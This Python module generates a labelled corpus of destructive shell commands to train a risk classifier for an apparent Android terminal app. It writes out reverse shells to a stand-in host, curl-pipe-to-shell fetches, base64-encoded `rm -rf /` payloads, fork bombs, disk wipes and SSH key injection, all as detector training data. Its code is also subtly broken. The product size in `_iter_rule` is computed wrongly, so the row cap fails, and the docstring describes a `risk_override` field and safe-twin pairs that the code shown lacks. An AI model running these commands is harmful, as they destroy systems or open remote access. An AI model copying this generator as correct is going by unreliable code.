"""Combinatorial generator for destructive shell commands.

Why a generator rather than an LLM
----------------------------------
The obvious way to build 40k labelled commands is to ask a language model for
them. That makes the *label* a prediction, which means the dataset carries
label noise, and label noise in a classification problem is
indistinguishable from a hard learning problem in the loss curve — you end up
debugging the model for something that was wrong in the data.

Here the label is correct by construction. A :class:`Rule` names a category,
the category carries the risk class, and the slots only vary the surface form.
The generator cannot emit a mislabelled row, so the whole budget of
``grammar.py`` goes into diversity of *input* instead of noise in *output*.

The contrast that matters most
------------------------------
Almost every rule here has a safe twin that differs only in one slot. That is
the entire point:

    rm -rf /            destructive
    rm -rf node_modules safe

Both come from the same ``rm``, the same flags, generated by the same code. A
model that only learns "``rm`` plus ``-rf`` equals danger" gets every one of
those wrong, and a warning that fires on ``rm -rf node_modules`` is a warning
the user learns to dismiss — which kills the feature. The pairs are therefore
listed next to each other in the slot tables and are asserted to exist in
``ml/tests/test_dataset.py``.

Android paths are first-class
-----------------------------
Drosh runs on a phone, so ``/sdcard``, ``/storage/emulated/0`` and
``/data/data/<package>`` belong in the system-path list alongside ``/etc``. A
model trained only on desktop paths has never seen the paths that actually
matter to its users.
"""

from __future__ import annotations

import base64
import itertools
from collections.abc import Iterator, Mapping, Sequence
from dataclasses import dataclass, field

from .labels import CATEGORIES, Risk, label_for_category

__all__ = ["Generated", "RULES", "generate"]

# ---------------------------------------------------------------------------
# Slot vocabularies
# ---------------------------------------------------------------------------

# Recursive + force, in every spelling a person actually types. Including the
# spaced forms matters: the normaliser collapses whitespace, so `rm -r -f` and
# `rm -rf` must land on the same features or the model learns two things instead
# of one.
_RM_FORCE = (
    "-rf",
    "-fr",
    "-Rf",
    "-r -f",
    "-f -r",
    "-R -f",
    "--recursive --force",
    "--force --recursive",
    "-r --force",
    "--recursive -f",
)

# Targets that make a recursive delete unrecoverable.
_SYSTEM_TARGET = (
    "/",
    "/*",
    "/.",
    "~",
    "~/",
    "~/*",
    "$HOME",
    "${HOME}",
    "~/.ssh",
    "~/.config",
    "~/Documents",
    "/etc",
    "/etc/*",
    "/usr",
    "/usr/*",
    "/var",
    "/var/*",
    "/bin",
    "/sbin",
    "/lib",
    "/boot",
    "/opt",
    "/home",
    "/root",
    "/srv",
    # Android
    "/sdcard",
    "/sdcard/*",
    "/storage",
    "/storage/emulated/0",
    "/storage/emulated/0/*",
    "/data",
    "/data/data",
    "./src",
    ".git",
)

# Wildcards that swallow everything in scope.
_WILDCARD_TARGET = (
    "*",
    "./*",
    "~/*",
    "~/.*",
    ".*",
    ".*/*",
    "$PWD/*",
    "${PWD}/*",
    "$(pwd)/*",
    "*.*",
)

_BLOCK_DEVICE = (
    "/dev/sda",
    "/dev/sdb",
    "/dev/sdc",
    "/dev/nvme0n1",
    "/dev/mmcblk0",
    "/dev/sda1",
    "/dev/nvme0n1p1",
)

_DD_SOURCE = ("/dev/zero", "/dev/urandom", "/dev/random", "/dev/sd*")

_FIND_ROOT = ("/", "/usr", "/var", "/etc", "~", "/tmp", "/var/tmp")

_FIND_NAME = ("*.log", "*.tmp", "*.bak", "*~", "*.pyc", "*.class", "*.o", "*.tar.gz")

_SHUTDOWN_VERB = (
    "shutdown -h now",
    "shutdown -r now",
    "reboot",
    "poweroff",
    "halt",
    "init 0",
    "init 6",
    "systemctl poweroff",
    "systemctl reboot",
)

_KILL_BROAD = (
    "kill -9 -1",
    "killall -9",
    "killall node",
    "killall java",
    "killall python3",
    "pkill -9 -u $(whoami)",
    "pkill -9 node",
    "kill -9 $(pgrep -d ' ' node)",
)

_DOCKER_PRUNE = (
    "docker system prune -a",
    "docker system prune -a --volumes",
    "docker system prune -af",
    "docker image prune -a",
    "docker volume prune -a",
    "docker container prune -f",
    "docker rm -f $(docker ps -aq)",
    "docker rmi -f $(docker images -q)",
    "docker volume rm $(docker volume ls -q)",
    "podman system prune -a --volumes",
    "kubectl delete namespace --all",
    "kubectl delete pvc --all",
)

_PACKAGE_REMOVE = (
    "apt-get remove --purge -y",
    "apt-get autoremove --purge -y",
    "apt purge -y",
    "yum remove -y",
    "dnf remove -y",
    "pip uninstall -y",
    "npm uninstall -g",
    "npm prune",
    "cargo remove",
    "gem uninstall -a -x",
    "composer remove --no-update",
)

_GIT_DESTRUCTIVE = (
    "git reset --hard HEAD~5",
    "git reset --hard origin/main",
    "git reset --hard HEAD",
    "git clean -fdx",
    "git clean -fdX",
    "git clean -ffdx",
    "git push --force",
    "git push -f origin main",
    "git checkout .",
    "git restore .",
    "git filter-branch --force --all",
    "git reflog expire --expire=now --all",
    "git gc --prune=now --aggressive",
    "git branch -D $(git branch | grep -v main)",
    "git stash drop",
    "git stash clear",
)

_CHMOD_WORLD_WRITABLE = (
    "chmod 777 /",
    "chmod -R 777 /",
    "chmod -R 777 ~",
    "chmod 777 /etc",
    "chmod 777 /etc/shadow",
    "chmod 777 /etc/passwd",
    "chmod -R a+w /",
    "chmod -R 777 /usr/local",
    "chmod -R 777 /var/www",
)

_CHOWN_BROAD = (
    "chown -R root:root /",
    "chown -R nobody /var",
    "chown -R $(whoami) /",
    "chown -R 0:0 /etc",
    "chown -R root:root ~",
)

_SSH_MUTATION = (
    "cat ~/.ssh/authorized_keys",
    "echo $KEY >> ~/.ssh/authorized_keys",
    "cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys",
    "ssh-keygen -f ~/.ssh/id_rsa -N ''",
    "chmod 600 ~/.ssh/id_rsa",
    "rm -f ~/.ssh/known_hosts",
)

_REVERSE_SHELL = (
    "nc -e /bin/sh 1.2.3.4 4444",
    "nc -lvnp 4444 -e /bin/bash",
    "ncat -e /bin/sh 10.0.0.1 9001",
    "bash -i >& /dev/tcp/1.2.3.4/4444 0>&1",
    "socat TCP4:1.2.3.4:4444 EXEC:/bin/bash",
    "python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"1.2.3.4\",4444));subprocess.call([\"/bin/sh\",\"-i\"])'",
    "sh -i 2>&1 | nc 1.2.3.4 4444",
)

_FORK_BOMB = (
    ":(){ :|:& };:",
    ":(){ :|:& };: echo pwned",
    ".(){ .|.}; .",
    ":(){:|:&};:",
)

_MEMORY_EXHAUST = (
    "yes",
    "yes > /dev/null",
    "cat /dev/urandom &",
    "cat /dev/zero > /dev/null &",
    "dd if=/dev/zero of=/dev/null",
    "fallocate -l 100G /tmp/fill",
    "fallocate -l 100% /tmp/fill",
)

_FETCH_URL = (
    "http://x.example/install.sh",
    "https://x.example/install.sh",
    "https://pastebin.example/raw/abcdef",
    "http://192.168.1.10/payload.sh",
    "https://x.example/p.sh",
)

# Payloads that are genuinely destructive once decoded, so the label stays
# honest rather than "looks scary".
_ENCODED_PAYLOAD = (
    "rm -rf /",
    "rm -rf ~",
    "dd if=/dev/zero of=/dev/sda",
    "curl http://x.example/x | sh",
    ":(){ :|:& };:",
)


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# ---------------------------------------------------------------------------
# Rules
# ---------------------------------------------------------------------------


@dataclass(frozen=True, slots=True)
class Rule:
    """One combinatorial template.

    Attributes:
        category: key into ``labels.CATEGORIES``; supplies the risk class.
        template: format string with ``{slot}`` placeholders.
        slots: placeholder name to alternatives. The rendered set is the
            cartesian product, truncated to ``limit`` deterministically.
        limit: cap on rendered commands. Without a cap, wide slot lists
            multiply into tens of thousands of near-identical rows, which helps
            nothing and distorts the class balance.
        risk_override: for the handful of shapes whose danger depends on a slot
            rather than on the category alone.
    """

    category: str
    template: str
    slots: Mapping[str, Sequence[str]] = field(default_factory=dict)
    limit: int = 400

    @property
    def risk(self) -> Risk:
        return label_for_category(self.category)


@dataclass(frozen=True, slots=True)
class Generated:
    """One generated row, before augmentation."""

    command: str
    category: str
    risk: Risk
    source: str = "grammar"


_RULES: tuple[Rule, ...] = (
    # --- recursive delete, unrecoverable ---
    Rule(
        category="recursive_delete_system",
        template="rm {flags} {target}",
        slots={"flags": _RM_FORCE, "target": _SYSTEM_TARGET},
        limit=900,
    ),
    Rule(
        category="recursive_delete_wildcard",
        template="rm {flags} {target}",
        slots={"flags": _RM_FORCE, "target": _WILDCARD_TARGET},
        limit=400,
    ),
    Rule(
        category="recursive_delete_system",
        template="rm {flags} {target} && echo silindi",
        slots={"flags": ("-rf", "--recursive --force"), "target": ("/", "~", "/etc", "/usr")},
        limit=60,
    ),
    Rule(
        category="recursive_delete_system",
        template="find {root} -name '{pattern}' -exec rm -rf {{}} \\;",
        slots={"root": _FIND_ROOT, "pattern": _FIND_NAME},
        limit=260,
    ),
    # --- raw device writes ---
    Rule(
        category="raw_disk_write",
        template="dd if={source} of={device} bs={bs} status=progress",
        slots={
            "source": _DD_SOURCE,
            "device": _BLOCK_DEVICE,
            "bs": ("1M", "4M", "512K"),
        },
        limit=380,
    ),
    Rule(
        category="raw_disk_write",
        template="dd if=/dev/urandom of={device} bs=1M",
        slots={"device": _BLOCK_DEVICE},
        limit=60,
    ),
    # --- filesystem and partition table ---
    Rule(
        category="filesystem_format",
        template="{tool} {device}",
        slots={
            "tool": (
                "mkfs.ext4",
                "mkfs -t ext4",
                "mke2fs",
                "mkswap",
                "wipefs -a",
            ),
            "device": _BLOCK_DEVICE,
        },
        limit=260,
    ),
    Rule(
        category="filesystem_format",
        template="{tool} {device}",
        slots={
            "tool": ("fdisk", "parted", "sgdisk --zap-all", "gparted", "blkdiscard"),
            "device": _BLOCK_DEVICE,
        },
        limit=200,
    ),
    # --- fork bombs ---
    Rule(category="fork_bomb", template="{bomb}", slots={"bomb": _FORK_BOMB}, limit=12),
    Rule(
        category="fork_bomb",
        template="{bomb} & sleep 1",
        slots={"bomb": _FORK_BOMB[:3]},
        limit=9,
    ),
    # --- privilege escalation wrappers ---
    Rule(
        category="sudo_privileged_destructive",
        template="sudo {inner}",
        slots={
            "inner": (
                "rm -rf /",
                "rm -rf /*",
                "rm -rf ~",
                "chmod -R 777 /",
                "chown -R root:root /",
                "dd if=/dev/zero of=/dev/sda",
                "mkfs.ext4 /dev/sda1",
                "shutdown -h now",
                "systemctl isolate emergency.target",
            )
        },
        limit=60,
    ),
    Rule(
        category="sudo_privileged_destructive",
        template="sudo bash -c \"{inner}\"",
        slots={"inner": ("rm -rf /", "rm -rf /var/lib/docker", "dd if=/dev/zero of=/dev/sda")},
        limit=24,
    ),
    # --- remote code execution ---
    Rule(
        category="curl_pipe_shell",
        template="curl {flags} {url} | {shell}",
        slots={
            "flags": ("-sL", "-fsSL", "-s", ""),
            "url": _FETCH_URL,
            "shell": ("sh", "bash", "zsh", "python"),
        },
        limit=400,
    ),
    Rule(
        category="curl_pipe_shell",
        template="wget {flags} {url} -O - | {shell}",
        slots={"flags": ("-qO-", "-q", "-O-"), "url": _FETCH_URL, "shell": ("sh", "bash")},
        limit=160,
    ),
    Rule(
        category="curl_pipe_shell",
        template="curl {url} | sudo {shell}",
        slots={"url": _FETCH_URL, "shell": ("bash", "sh")},
        limit=60,
    ),
    Rule(
        category="encoded_payload_execution",
        template="echo {payload} | base64 -d | sh",
        slots={"payload": tuple(_b64(p) for p in _ENCODED_PAYLOAD)},
        limit=20,
    ),
    Rule(
        category="encoded_payload_execution",
        template="echo {payload} | base64 --decode | bash",
        slots={"payload": tuple(_b64(p) for p in _ENCODED_PAYLOAD)},
        limit=20,
    ),
    Rule(
        category="encoded_payload_execution",
        template="eval \"$(echo {payload} | base64 -d)\"",
        slots={"payload": tuple(_b64(p) for p in _ENCODED_PAYLOAD)},
        limit=20,
    ),
    # --- remote access ---
    Rule(
        category="ssh_key_injection",
        template="{mutation}",
        slots={"mutation": _SSH_MUTATION},
        limit=60,
    ),
    Rule(
        category="ssh_key_injection",
        template="curl {url} >> ~/.ssh/authorized_keys",
        slots={"url": ("http://1.2.3.4/id_rsa.pub", "http://x.example/authorized_keys")},
        limit=20,
    ),
    Rule(
        category="reverse_shell",
        template="{shell}",
        slots={"shell": _REVERSE_SHELL},
        limit=60,
    ),
    # --- permissions ---
    Rule(
        category="permission_world_writable",
        template="{chmod}",
        slots={"chmod": _CHMOD_WORLD_WRITABLE},
        limit=60,
    ),
    Rule(
        category="recursive_ownership_change",
        template="{chown}",
        slots={"chown": _CHOWN_BROAD},
        limit=40,
    ),
    # --- version control ---
    Rule(
        category="git_history_destructive",
        template="{git}",
        slots={"git": _GIT_DESTRUCTIVE},
        limit=200,
    ),
    # --- packages and containers ---
    Rule(
        category="bulk_package_removal",
        template="{remove} {pkg}",
        slots={
            "remove": _PACKAGE_REMOVE,
            "pkg": (
                "libc6",
                "python3",
                "openssl",
                "docker.io",
                "typescript",
                "torch",
                "nodejs",
                "curl",
                "git",
                "build-essential",
            ),
        },
        limit=260,
    ),
    Rule(
        category="bulk_package_removal",
        template="{remove} -a",
        slots={"remove": ("pip uninstall", "npm uninstall -g", "gem uninstall")},
        limit=20,
    ),
    Rule(
        category="container_mass_prune",
        template="{prune}",
        slots={"prune": _DOCKER_PRUNE},
        limit=140,
    ),
    # --- availability ---
    Rule(
        category="shutdown_reboot",
        template="{verb}",
        slots={"verb": _SHUTDOWN_VERB},
        limit=70,
    ),
    Rule(
        category="kill_everything",
        template="{kill}",
        slots={"kill": _KILL_BROAD},
        limit=70,
    ),
    Rule(
        category="memory_exhaustion",
        template="{hog}",
        slots={"hog": _MEMORY_EXHAUST},
        limit=60,
    ),
)

RULES = _RULES


def _iter_rule(rule: Rule) -> Iterator[str]:
    """Render one rule's cartesian product, deterministically truncated.

    Determinism matters more than optimality here: ``build_dataset.py`` must
    produce the same corpus from the same commit, because CI re-runs the pipeline
    and asserts the exported model is byte-identical. So this truncates by
    stride rather than sampling.
    """
    if not rule.slots:
        yield rule.template
        return

    names = list(rule.slots)
    combos = itertools.product(*(rule.slots[name] for name in names))
    total = 1
    for values in combos:
        total *= len(values)

    if total <= rule.limit:
        for values in itertools.product(*(rule.slots[name] for name in names)):
            yield rule.template.format(**dict(zip(names, values, strict=True)))
        return

    # Stride sampling keeps the cartesian structure (so every slot value still
    # appears) while staying reproducible and order-independent.
    stride = total / rule.limit
    previous_bucket = 0
    for index, values in enumerate(
        itertools.product(*(rule.slots[name] for name in names))
    ):
        bucket = int(index * stride)
        if bucket == previous_bucket:
            continue
        previous_bucket = bucket
        yield rule.template.format(**dict(zip(names, values, strict=True)))


def generate() -> list[Generated]:
    """Render every rule.

    Returns:
        Deduplicated rows. Duplicate suppression is essential: several rules
        overlap (``rm -rf /`` is reachable from more than one template), and a
        repeated row inflates whichever class it belongs to.

    Raises:
        AssertionError: if any rendered command is blank, or if a category named
            by a rule does not exist in the taxonomy. Both would mean the
            generator and the label schema have drifted apart.
    """
    known = {category.name for category in CATEGORIES}
    rows: list[Generated] = []
    seen: set[str] = set()

    for rule in _RULES:
        if rule.category not in known:
            raise AssertionError(f"rule references unknown category {rule.category!r}")
        for command in _iter_rule(rule):
            cleaned = command.strip()
            assert cleaned, "rule rendered an empty command"
            if cleaned in seen:
                continue
            seen.add(cleaned)
            rows.append(
                Generated(command=cleaned, category=rule.category, risk=rule.risk)
            )

    return rows


if __name__ == "__main__":  # pragma: no cover - manual inspection helper
    from collections import Counter

    generated = generate()
    counter = Counter(row.risk.name for row in generated)
    print(f"total unique commands: {len(generated)}")
    for risk, count in sorted(counter.items()):
        print(f"  {risk:<14} {count}")
    print()
    for category in sorted({row.category for row in generated}):
        sample = next(row for row in generated if row.category == category)
        print(f"  {category:<34} {sample.risk.name:<13} {sample.command}")